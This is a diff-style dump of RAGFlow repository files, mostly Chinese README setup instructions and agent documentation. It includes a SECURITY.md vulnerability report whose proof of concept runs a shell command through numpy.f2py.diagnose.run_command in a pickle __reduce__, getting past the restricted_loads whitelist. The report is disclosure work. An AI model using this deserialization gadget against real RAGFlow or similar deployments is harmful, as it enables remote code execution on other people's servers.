251
+
252
+ ## 🔧 原始碼編譯 Docker 映像(包含 embedding 模型)
253
+
254
+ 本 Docker 大小約 9 GB 左右。由於已包含 embedding 模型,所以只需依賴外部的大模型服務即可。
255
+
256
+ ```bash
257
+ git clone https://github.com/infiniflow/ragflow.git
258
+ cd ragflow/
259
+ docker build --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
260
+ ```
261
+
262
+ ## 🔨 以原始碼啟動服務
263
+
264
+ 1. 安裝 uv。如已安裝,可跳過此步驟:
265
+
266
+ ```bash
267
+ pipx install uv
268
+ export UV_INDEX=https://pypi.tuna.tsinghua.edu.cn/simple
269
+ ```
270
+
271
+ 2. 下載原始碼並安裝 Python 依賴:
272
+
273
+ ```bash
274
+ git clone https://github.com/infiniflow/ragflow.git
275
+ cd ragflow/
276
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
277
+ ```
278
+
279
+ 3. 透過 Docker Compose 啟動依賴的服務(MinIO, Elasticsearch, Redis, and MySQL):
280
+
281
+ ```bash
282
+ docker compose -f docker/docker-compose-base.yml up -d
283
+ ```
284
+
285
+ 在 `/etc/hosts` 中加入以下程式碼,將 **conf/service_conf.yaml** 檔案中的所有 host 位址都解析為 `127.0.0.1`:
286
+
287
+ ```
288
+ 127.0.0.1 es01 infinity mysql minio redis
289
+ ```
290
+
291
+ 4. 如果無法存取 HuggingFace,可以把環境變數 `HF_ENDPOINT` 設為對應的鏡像網站:
292
+
293
+ ```bash
294
+ export HF_ENDPOINT=https://hf-mirror.com
295
+ ```
296
+
297
+ 5.啟動後端服務:
298
+ 『`bash
299
+ source .venv/bin/activate
300
+ export PYTHONPATH=$(pwd)
301
+ bash docker/launch_backend_service.sh
302
+
303
+ ```
304
+
305
+ 6. 安裝前端依賴:
306
+ 『`bash
307
+ cd web
308
+ npm install
309
+ ```
310
+
311
+ 7. 啟動前端服務:
312
+ 『`bash
313
+ npm run dev
314
+
315
+ ```
316
+
317
+ 以下界面說明系統已成功啟動:_
318
+
319
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
320
+ ```
321
+
322
+ ## 📚 技術文檔
323
+
324
+ - [Quickstart](https://ragflow.io/docs/dev/)
325
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
326
+ - [References](https://ragflow.io/docs/dev/category/references)
327
+ - [FAQ](https://ragflow.io/docs/dev/faq)
328
+
329
+ ## 📜 路線圖
330
+
331
+ 詳見 [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214) 。
332
+
333
+ ## 🏄 開源社群
334
+
335
+ - [Discord](https://discord.gg/4XxujFgUN7)
336
+ - [Twitter](https://twitter.com/infiniflowai)
337
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
338
+
339
+ ## 🙌 貢獻指南
340
+
341
+ RAGFlow 只有透過開源協作才能蓬勃發展。秉持這項精神,我們歡迎來自社區的各種貢獻。如果您有意參與其中,請查閱我們的 [貢獻者指南](./CONTRIBUTING.md) 。
342
+
343
+ ## 🤝 商務合作
344
+
345
+ - [預約諮詢](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
346
+
347
+ ## 👥 加入社區
348
+
349
+ 掃二維碼加入 RAGFlow 小助手,進 RAGFlow 交流群。
350
+
351
+ <p align="center">
352
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
353
+ </p>
ragflow-main/README_zh.md ADDED
@@ -0,0 +1,352 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ <div align="center">
2
+ <a href="https://demo.ragflow.io/">
3
+ <img src="web/src/assets/logo-with-text.png" width="350" alt="ragflow logo">
4
+ </a>
5
+ </div>
6
+
7
+ <p align="center">
8
+ <a href="./README.md">English</a> |
9
+ <a href="./README_zh.md">简体中文</a> |
10
+ <a href="./README_tzh.md">繁体中文</a> |
11
+ <a href="./README_ja.md">日本語</a> |
12
+ <a href="./README_ko.md">한국어</a> |
13
+ <a href="./README_id.md">Bahasa Indonesia</a> |
14
+ <a href="/README_pt_br.md">Português (Brasil)</a>
15
+ </p>
16
+
17
+ <p align="center">
18
+ <a href="https://x.com/intent/follow?screen_name=infiniflowai" target="_blank">
19
+ <img src="https://img.shields.io/twitter/follow/infiniflow?logo=X&color=%20%23f5f5f5" alt="follow on X(Twitter)">
20
+ </a>
21
+ <a href="https://demo.ragflow.io" target="_blank">
22
+ <img alt="Static Badge" src="https://img.shields.io/badge/Online-Demo-4e6b99">
23
+ </a>
24
+ <a href="https://hub.docker.com/r/infiniflow/ragflow" target="_blank">
25
+ <img src="https://img.shields.io/badge/docker_pull-ragflow:v0.16.0-brightgreen" alt="docker pull infiniflow/ragflow:v0.16.0">
26
+ </a>
27
+ <a href="https://github.com/infiniflow/ragflow/releases/latest">
28
+ <img src="https://img.shields.io/github/v/release/infiniflow/ragflow?color=blue&label=Latest%20Release" alt="Latest Release">
29
+ </a>
30
+ <a href="https://github.com/infiniflow/ragflow/blob/main/LICENSE">
31
+ <img height="21" src="https://img.shields.io/badge/License-Apache--2.0-ffffff?labelColor=d4eaf7&color=2e6cc4" alt="license">
32
+ </a>
33
+ </p>
34
+
35
+ <h4 align="center">
36
+ <a href="https://ragflow.io/docs/dev/">Document</a> |
37
+ <a href="https://github.com/infiniflow/ragflow/issues/4214">Roadmap</a> |
38
+ <a href="https://twitter.com/infiniflowai">Twitter</a> |
39
+ <a href="https://discord.gg/4XxujFgUN7">Discord</a> |
40
+ <a href="https://demo.ragflow.io">Demo</a>
41
+ </h4>
42
+
43
+ ## 💡 RAGFlow 是什么?
44
+
45
+ [RAGFlow](https://ragflow.io/) 是一款基于深度文档理解构建的开源 RAG(Retrieval-Augmented Generation)引擎。RAGFlow 可以为各种规模的企业及个人提供一套精简的 RAG 工作流程,结合大语言模型(LLM)针对用户各类不同的复杂格式数据提供可靠的问答以及有理有据的引用。
46
+
47
+ ## 🎮 Demo 试用
48
+
49
+ 请登录网址 [https://demo.ragflow.io](https://demo.ragflow.io) 试用 demo。
50
+
51
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
52
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/2f6baa3e-1092-4f11-866d-36f6a9d075e5" width="1200"/>
53
+ <img src="https://github.com/user-attachments/assets/504bbbf1-c9f7-4d83-8cc5-e9cb63c26db6" width="1200"/>
54
+ </div>
55
+
56
+ ## 🔥 近期更新
57
+
58
+ - 2025-02-05 更新硅基流动的模型列表,增加了对 Deepseek-R1/DeepSeek-V3 的支持。
59
+ - 2025-01-26 优化知识图谱的提取和应用,提供了多种配置选择。
60
+ - 2024-12-18 升级了 Deepdoc 的文档布局分析模型。
61
+ - 2024-12-04 支持知识库的 Pagerank 分数。
62
+ - 2024-11-22 完善了 Agent 中的变量定义和使用。
63
+ - 2024-11-01 对解析后的 chunk 加入关键词抽取和相关问题生成以提高召回的准确度。
64
+ - 2024-08-22 支持用 RAG 技术实现从自然语言到 SQL 语句的转换。
65
+
66
+ ## 🎉 关注项目
67
+
68
+ ⭐️ 点击右上角的 Star 关注 RAGFlow,可以获取最新发布的实时通知 !🌟
69
+
70
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
71
+ <img src="https://github.com/user-attachments/assets/18c9707e-b8aa-4caf-a154-037089c105ba" width="1200"/>
72
+ </div>
73
+
74
+ ## 🌟 主要功能
75
+
76
+ ### 🍭 **"Quality in, quality out"**
77
+
78
+ - 基于[深度文档理解](./deepdoc/README.md),能够从各类复杂格式的非结构化数据中提取真知灼见。
79
+ - 真正在无限上下文(token)的场景下快速完成大海捞针测试。
80
+
81
+ ### 🍱 **基于模板的文本切片**
82
+
83
+ - 不仅仅是智能,更重要的是可控可解释。
84
+ - 多种文本模板可供选择
85
+
86
+ ### 🌱 **有理有据、最大程度降低幻觉(hallucination)**
87
+
88
+ - 文本切片过程可视化,支持手动调整。
89
+ - 有理有据:答案提供关键引用的快照并支持追根溯源。
90
+
91
+ ### 🍔 **兼容各类异构数据源**
92
+
93
+ - 支持丰富的文件类型,包括 Word 文档、PPT、excel 表格、txt 文件、图片、PDF、影印件、复印件、结构化数据、网页等。
94
+
95
+ ### 🛀 **全程无忧、自动化的 RAG 工作流**
96
+
97
+ - 全面优化的 RAG 工作流可以支持从个人应用乃至超大型企业的各类生态系统。
98
+ - 大语言模型 LLM 以及向量模型均支持配置。
99
+ - 基于多路召回、融合重排序。
100
+ - 提供易用的 API,可以轻松集成到各类企业系统。
101
+
102
+ ## 🔎 系统架构
103
+
104
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
105
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/d6ac5664-c237-4200-a7c2-a4a00691b485" width="1000"/>
106
+ </div>
107
+
108
+ ## 🎬 快速开始
109
+
110
+ ### 📝 前提条件
111
+
112
+ - CPU >= 4 核
113
+ - RAM >= 16 GB
114
+ - Disk >= 50 GB
115
+ - Docker >= 24.0.0 & Docker Compose >= v2.26.1
116
+ > 如果你并没有在本机安装 Docker(Windows、Mac,或者 Linux), 可以参考文档 [Install Docker Engine](https://docs.docker.com/engine/install/) 自行安装。
117
+
118
+ ### 🚀 启动服务器
119
+
120
+ 1. 确保 `vm.max_map_count` 不小于 262144:
121
+
122
+ > 如需确认 `vm.max_map_count` 的大小:
123
+ >
124
+ > ```bash
125
+ > $ sysctl vm.max_map_count
126
+ > ```
127
+ >
128
+ > 如果 `vm.max_map_count` 的值小于 262144,可以进行重置:
129
+ >
130
+ > ```bash
131
+ > # 这里我们设为 262144:
132
+ > $ sudo sysctl -w vm.max_map_count=262144
133
+ > ```
134
+ >
135
+ > 你的改动会在下次系统重启时被重置。如果希望做永久改动,还需要在 **/etc/sysctl.conf** 文件里把 `vm.max_map_count` 的值再相应更新一遍:
136
+ >
137
+ > ```bash
138
+ > vm.max_map_count=262144
139
+ > ```
140
+
141
+ 2. 克隆仓库:
142
+
143
+ ```bash
144
+ $ git clone https://github.com/infiniflow/ragflow.git
145
+ ```
146
+
147
+ 3. 进入 **docker** 文件夹,利用提前编译好的 Docker 镜像启动服务器:
148
+
149
+ > 运行以下命令会自动下载 RAGFlow slim Docker 镜像 `v0.16.0-slim`。请参考下表查看不同 Docker 发行版的描述。如需下载不同于 `v0.16.0-slim` 的 Docker 镜像,请在运行 `docker compose` 启动服务之前先更新 **docker/.env** 文件内的 `RAGFLOW_IMAGE` 变量。比如,你可以通过设置 `RAGFLOW_IMAGE=infiniflow/ragflow:v0.16.0` 来下载 RAGFlow 镜像的 `v0.16.0` 完整发行版。
150
+
151
+ ```bash
152
+ $ cd ragflow
153
+ $ docker compose -f docker/docker-compose.yml up -d
154
+ ```
155
+
156
+ | RAGFlow image tag | Image size (GB) | Has embedding models? | Stable? |
157
+ | ----------------- | --------------- | --------------------- | ------------------------ |
158
+ | v0.16.0 | &approx;9 | :heavy_check_mark: | Stable release |
159
+ | v0.16.0-slim | &approx;2 | ❌ | Stable release |
160
+ | nightly | &approx;9 | :heavy_check_mark: | _Unstable_ nightly build |
161
+ | nightly-slim | &approx;2 | ❌ | _Unstable_ nightly build |
162
+
163
+ > [!TIP]
164
+ > 如果你遇到 Docker 镜像拉不下来的问题,可以在 **docker/.env** 文件内根据变量 `RAGFLOW_IMAGE` 的注释提示选择华为云或者阿里云的相应镜像。
165
+ >
166
+ > - 华为云镜像名:`swr.cn-north-4.myhuaweicloud.com/infiniflow/ragflow`
167
+ > - 阿里云镜像名:`registry.cn-hangzhou.aliyuncs.com/infiniflow/ragflow`
168
+
169
+ 4. 服务器启动成功后再次确认服务器状态:
170
+
171
+ ```bash
172
+ $ docker logs -f ragflow-server
173
+ ```
174
+
175
+ _出现以下界面提示说明服务器启动成功:_
176
+
177
+ ```bash
178
+ ____ ___ ______ ______ __
179
+ / __ \ / | / ____// ____// /____ _ __
180
+ / /_/ // /| | / / __ / /_ / // __ \| | /| / /
181
+ / _, _// ___ |/ /_/ // __/ / // /_/ /| |/ |/ /
182
+ /_/ |_|/_/ |_|\____//_/ /_/ \____/ |__/|__/
183
+
184
+ * Running on all addresses (0.0.0.0)
185
+ * Running on http://127.0.0.1:9380
186
+ * Running on http://x.x.x.x:9380
187
+ INFO:werkzeug:Press CTRL+C to quit
188
+ ```
189
+
190
+ > 如果您跳过这一步系统确认步骤就登录 RAGFlow,你的浏览器有可能会提示 `network anormal` 或 `网络异常`,因为 RAGFlow 可能并未完全启动成功。
191
+
192
+ 5. 在你的浏览器中输入你的服务器对应的 IP 地址并登录 RAGFlow。
193
+ > 上面这个例子中,您只需输入 http://IP_OF_YOUR_MACHINE 即可:未改动过配置则无需输入端口(默认的 HTTP 服务端口 80)。
194
+ 6. 在 [service_conf.yaml.template](./docker/service_conf.yaml.template) 文件的 `user_default_llm` 栏配置 LLM factory,并在 `API_KEY` 栏填写和你选择的大模型相对应的 API key。
195
+
196
+ > 详见 [llm_api_key_setup](https://ragflow.io/docs/dev/llm_api_key_setup)。
197
+
198
+ _好戏开始,接着奏乐接着舞!_
199
+
200
+ ## 🔧 系统配置
201
+
202
+ 系统配置涉及以下三份文件:
203
+
204
+ - [.env](./docker/.env):存放一些基本的系统环境变量,比如 `SVR_HTTP_PORT`、`MYSQL_PASSWORD`、`MINIO_PASSWORD` 等。
205
+ - [service_conf.yaml.template](./docker/service_conf.yaml.template):配置各类后台服务。
206
+ - [docker-compose.yml](./docker/docker-compose.yml): 系统依赖该文件完成启动。
207
+
208
+ 请务必确保 [.env](./docker/.env) 文件中的变量设置与 [service_conf.yaml.template](./docker/service_conf.yaml.template) 文件中的配置保持一致!
209
+
210
+ 如果不能访问镜像站点 hub.docker.com 或者模型站点 huggingface.co,请按照 [.env](./docker/.env) 注释修改 `RAGFLOW_IMAGE` 和 `HF_ENDPOINT`。
211
+
212
+ > [./docker/README](./docker/README.md) 解释了 [service_conf.yaml.template](./docker/service_conf.yaml.template) 用到的环境变量设置和服务配置。
213
+
214
+ 如需更新默认的 HTTP 服务端口(80), 可以在 [docker-compose.yml](./docker/docker-compose.yml) 文件中将配置 `80:80` 改为 `<YOUR_SERVING_PORT>:80`。
215
+
216
+ > 所有系统配置都需要通过系统重启生效:
217
+ >
218
+ > ```bash
219
+ > $ docker compose -f docker/docker-compose.yml up -d
220
+ > ```
221
+
222
+ ### 把文档引擎从 Elasticsearch ��换成为 Infinity
223
+
224
+ RAGFlow 默认使用 Elasticsearch 存储文本和向量数据. 如果要切换为 [Infinity](https://github.com/infiniflow/infinity/), 可以按照下面步骤进行:
225
+
226
+ 1. 停止所有容器运行:
227
+
228
+ ```bash
229
+ $ docker compose -f docker/docker-compose.yml down -v
230
+ ```
231
+
232
+ 2. 设置 **docker/.env** 目录中的 `DOC_ENGINE` 为 `infinity`.
233
+
234
+ 3. 启动容器:
235
+
236
+ ```bash
237
+ $ docker compose -f docker/docker-compose.yml up -d
238
+ ```
239
+
240
+ > [!WARNING]
241
+ > Infinity 目前官方并未正式支持在 Linux/arm64 架构下的机器上运行.
242
+
243
+ ## 🔧 源码编译 Docker 镜像(不含 embedding 模型)
244
+
245
+ 本 Docker 镜像大小约 2 GB 左右并且依赖外部的大模型和 embedding 服务。
246
+
247
+ ```bash
248
+ git clone https://github.com/infiniflow/ragflow.git
249
+ cd ragflow/
250
+ docker build --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
251
+ ```
252
+
253
+ ## 🔧 源码编译 Docker 镜像(包含 embedding 模型)
254
+
255
+ 本 Docker 大小约 9 GB 左右。由于已包含 embedding 模型,所以只需依赖外部的大模型服务即可。
256
+
257
+ ```bash
258
+ git clone https://github.com/infiniflow/ragflow.git
259
+ cd ragflow/
260
+ docker build --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
261
+ ```
262
+
263
+ ## 🔨 以源代码启动服务
264
+
265
+ 1. 安装 uv。如已经安装,可跳过本步骤:
266
+
267
+ ```bash
268
+ pipx install uv
269
+ export UV_INDEX=https://pypi.tuna.tsinghua.edu.cn/simple
270
+ ```
271
+
272
+ 2. 下载源代码并安装 Python 依赖:
273
+
274
+ ```bash
275
+ git clone https://github.com/infiniflow/ragflow.git
276
+ cd ragflow/
277
+ uv sync --python 3.10 --all-extras # install RAGFlow dependent python modules
278
+ ```
279
+
280
+ 3. 通过 Docker Compose 启动依赖的服务(MinIO, Elasticsearch, Redis, and MySQL):
281
+
282
+ ```bash
283
+ docker compose -f docker/docker-compose-base.yml up -d
284
+ ```
285
+
286
+ 在 `/etc/hosts` 中添加以下代码,将 **conf/service_conf.yaml** 文件中的所有 host 地址都解析为 `127.0.0.1`:
287
+
288
+ ```
289
+ 127.0.0.1 es01 infinity mysql minio redis
290
+ ```
291
+
292
+ 4. 如果无法访问 HuggingFace,可以把环境变量 `HF_ENDPOINT` 设成相应的镜像站点:
293
+
294
+ ```bash
295
+ export HF_ENDPOINT=https://hf-mirror.com
296
+ ```
297
+
298
+ 5. 启动后端服务:
299
+
300
+ ```bash
301
+ source .venv/bin/activate
302
+ export PYTHONPATH=$(pwd)
303
+ bash docker/launch_backend_service.sh
304
+ ```
305
+
306
+ 6. 安装前端依赖:
307
+ ```bash
308
+ cd web
309
+ npm install
310
+ ```
311
+ 7. 启动前端服务:
312
+
313
+ ```bash
314
+ npm run dev
315
+ ```
316
+
317
+ _以下界面说明系统已经成功启动:_
318
+
319
+ ![](https://github.com/user-attachments/assets/0daf462c-a24d-4496-a66f-92533534e187)
320
+
321
+ ## 📚 技术文档
322
+
323
+ - [Quickstart](https://ragflow.io/docs/dev/)
324
+ - [User guide](https://ragflow.io/docs/dev/category/guides)
325
+ - [References](https://ragflow.io/docs/dev/category/references)
326
+ - [FAQ](https://ragflow.io/docs/dev/faq)
327
+
328
+ ## 📜 路线图
329
+
330
+ 详见 [RAGFlow Roadmap 2025](https://github.com/infiniflow/ragflow/issues/4214) 。
331
+
332
+ ## 🏄 开源社区
333
+
334
+ - [Discord](https://discord.gg/4XxujFgUN7)
335
+ - [Twitter](https://twitter.com/infiniflowai)
336
+ - [GitHub Discussions](https://github.com/orgs/infiniflow/discussions)
337
+
338
+ ## 🙌 贡献指南
339
+
340
+ RAGFlow 只有通过开源协作才能蓬勃发展。秉持这一精神,我们欢迎来自社区的各种贡献。如果您有意参与其中,请查阅我们的 [贡献者指南](./CONTRIBUTING.md) 。
341
+
342
+ ## 🤝 商务合作
343
+
344
+ - [预约咨询](https://aao615odquw.feishu.cn/share/base/form/shrcnjw7QleretCLqh1nuPo1xxh)
345
+
346
+ ## 👥 加入社区
347
+
348
+ 扫二维码添加 RAGFlow 小助手,进 RAGFlow 交流群。
349
+
350
+ <p align="center">
351
+ <img src="https://github.com/infiniflow/ragflow/assets/7248/bccf284f-46f2-4445-9809-8f1030fb7585" width=50% height=50%>
352
+ </p>
ragflow-main/SECURITY.md ADDED
@@ -0,0 +1,74 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Security Policy
2
+
3
+ ## Supported Versions
4
+
5
+ Use this section to tell people about which versions of your project are
6
+ currently being supported with security updates.
7
+
8
+ | Version | Supported |
9
+ | ------- | ------------------ |
10
+ | <=0.7.0 | :white_check_mark: |
11
+
12
+ ## Reporting a Vulnerability
13
+
14
+ ### Branch name
15
+
16
+ main
17
+
18
+ ### Actual behavior
19
+
20
+ The restricted_loads function at [api/utils/__init__.py#L215](https://github.com/infiniflow/ragflow/blob/main/api/utils/__init__.py#L215) is still vulnerable leading via code execution.
21
+ The main reason is that numpy module has a numpy.f2py.diagnose.run_command function directly execute commands, but the restricted_loads function allows users import functions in module numpy.
22
+
23
+
24
+ ### Steps to reproduce
25
+
26
+
27
+ **ragflow_patch.py**
28
+
29
+ ```py
30
+ import builtins
31
+ import io
32
+ import pickle
33
+
34
+ safe_module = {
35
+ 'numpy',
36
+ 'rag_flow'
37
+ }
38
+
39
+
40
+ class RestrictedUnpickler(pickle.Unpickler):
41
+ def find_class(self, module, name):
42
+ import importlib
43
+ if module.split('.')[0] in safe_module:
44
+ _module = importlib.import_module(module)
45
+ return getattr(_module, name)
46
+ # Forbid everything else.
47
+ raise pickle.UnpicklingError("global '%s.%s' is forbidden" %
48
+ (module, name))
49
+
50
+
51
+ def restricted_loads(src):
52
+ """Helper function analogous to pickle.loads()."""
53
+ return RestrictedUnpickler(io.BytesIO(src)).load()
54
+ ```
55
+ Then, **PoC.py**
56
+ ```py
57
+ import pickle
58
+ from ragflow_patch import restricted_loads
59
+ class Exploit:
60
+ def __reduce__(self):
61
+ import numpy.f2py.diagnose
62
+ return numpy.f2py.diagnose.run_command, ('whoami', )
63
+
64
+ Payload=pickle.dumps(Exploit())
65
+ restricted_loads(Payload)
66
+ ```
67
+ **Result**
68
+ ![image](https://github.com/infiniflow/ragflow/assets/85293841/8e5ed255-2e84-466c-bce4-776f7e4401e8)
69
+
70
+
71
+ ### Additional information
72
+
73
+ #### How to prevent?
74
+ Strictly filter the module and name before calling with getattr function.
ragflow-main/agent/README.md ADDED
@@ -0,0 +1,45 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ English | [简体中文](./README_zh.md)
2
+
3
+ # *Graph*
4
+
5
+
6
+ ## Introduction
7
+
8
+ *Graph* is a mathematical concept which is composed of nodes and edges.
9
+ It is used to compose a complex work flow or agent.
10
+ And this graph is beyond the DAG that we can use circles to describe our agent or work flow.
11
+ Under this folder, we propose a test tool ./test/client.py which can test the DSLs such as json files in folder ./test/dsl_examples.
12
+ Please use this client at the same folder you start RAGFlow. If it's run by Docker, please go into the container before running the client.
13
+ Otherwise, correct configurations in service_conf.yaml is essential.
14
+
15
+ ```bash
16
+ PYTHONPATH=path/to/ragflow python graph/test/client.py -h
17
+ usage: client.py [-h] -s DSL -t TENANT_ID -m
18
+
19
+ options:
20
+ -h, --help show this help message and exit
21
+ -s DSL, --dsl DSL input dsl
22
+ -t TENANT_ID, --tenant_id TENANT_ID
23
+ Tenant ID
24
+ -m, --stream Stream output
25
+ ```
26
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
27
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/79179c5e-d4d6-464a-b6c4-5721cb329899" width="1000"/>
28
+ </div>
29
+
30
+
31
+ ## How to gain a TENANT_ID in command line?
32
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
33
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
34
+ </div>
35
+ 💡 We plan to display it here in the near future.
36
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
37
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
38
+ </div>
39
+
40
+
41
+ ## How to set 'kb_ids' for component 'Retrieval' in DSL?
42
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
43
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
44
+ </div>
45
+
ragflow-main/agent/README_zh.md ADDED
@@ -0,0 +1,46 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ [English](./README.md) | 简体中文
2
+
3
+ # *Graph*
4
+
5
+
6
+ ## 简介
7
+
8
+ "Graph"是一个由节点和边组成的数学概念。
9
+ 它被用来构建复杂的工作流或代理。
10
+ 这个图超越了有向无环图(DAG),我们可以使用循环来描述我们的代理或工作流。
11
+ 在这个文件夹下,我们提出了一个测试工具 ./test/client.py,
12
+ 它可以测试像文件夹./test/dsl_examples下一样的DSL文件。
13
+ 请在启动 RAGFlow 的同一文件夹中使用此客户端。如果它是通过 Docker 运行的,请在运行客户端之前进入容器。
14
+ 否则,正确配置 service_conf.yaml 文件是必不可少的。
15
+
16
+ ```bash
17
+ PYTHONPATH=path/to/ragflow python graph/test/client.py -h
18
+ usage: client.py [-h] -s DSL -t TENANT_ID -m
19
+
20
+ options:
21
+ -h, --help show this help message and exit
22
+ -s DSL, --dsl DSL input dsl
23
+ -t TENANT_ID, --tenant_id TENANT_ID
24
+ Tenant ID
25
+ -m, --stream Stream output
26
+ ```
27
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
28
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/05924730-c427-495b-8ee4-90b8b2250681" width="1000"/>
29
+ </div>
30
+
31
+
32
+ ## 命令行中的TENANT_ID如何获得?
33
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
34
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/419d8588-87b1-4ab8-ac49-2d1f047a4b97" width="600"/>
35
+ </div>
36
+ 💡 后面会展示在这里:
37
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
38
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/c97915de-0091-46a5-afd9-e278946e5fe3" width="600"/>
39
+ </div>
40
+
41
+
42
+ ## DSL里面的Retrieval组件的kb_ids怎么填?
43
+ <div align="center" style="margin-top:20px;margin-bottom:20px;">
44
+ <img src="https://github.com/infiniflow/ragflow/assets/12318111/0a731534-cac8-49fd-8a92-ca247eeef66d" width="600"/>
45
+ </div>
46
+
ragflow-main/agent/__init__.py ADDED
@@ -0,0 +1,18 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2025 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
+ # http://www.apache.org/licenses/LICENSE-2.0
9
+ #
10
+ # Unless required by applicable law or agreed to in writing, software
11
+ # distributed under the License is distributed on an "AS IS" BASIS,
12
+ # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
13
+ # See the License for the specific language governing permissions and
14
+ # limitations under the License.
15
+ #
16
+
17
+ from beartype.claw import beartype_this_package
18
+ beartype_this_package()
ragflow-main/agent/canvas.py ADDED
@@ -0,0 +1,366 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ #
2
+ # Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
3
+ #
4
+ # Licensed under the Apache License, Version 2.0 (the "License");
5
+ # you may not use this file except in compliance with the License.
6
+ # You may obtain a copy of the License at
7
+ #
8
